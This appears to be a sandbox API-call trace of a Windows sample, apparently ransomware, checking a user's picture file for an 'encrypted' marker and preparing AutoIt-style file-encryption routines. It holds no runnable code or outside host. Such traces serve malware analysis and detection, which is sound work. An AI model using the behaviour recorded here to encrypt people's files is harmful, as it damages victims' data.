(Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.703] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ks-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dt6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pjw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jw\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="77o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YBs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bs-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VwSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wSh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sh8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OiiJ.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.706] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.706] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0039.706] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.706] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.706] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.706] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.706] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.706] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.706] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.706] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\77o YBs-VwSh8X3OiiJ.gif", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2618aff0, ftCreationTime.dwHighDateTime=0x1d5c1d3, ftLastAccessTime.dwLowDateTime=0xd82532f0, ftLastAccessTime.dwHighDateTime=0x1d5c2ea, ftLastWriteTime.dwLowDateTime=0xd82532f0, ftLastWriteTime.dwHighDateTime=0x1d5c2ea, nFileSizeHigh=0x0, nFileSizeLow=0x12195, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="77o YBs-VwSh8X3OiiJ.gif", cAlternateFileName="77OYBS~1.GIF")) returned 0x7c2240 [0039.706] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.707] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.707] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.707] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.707] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.707] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.707] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.707] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0039.707] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 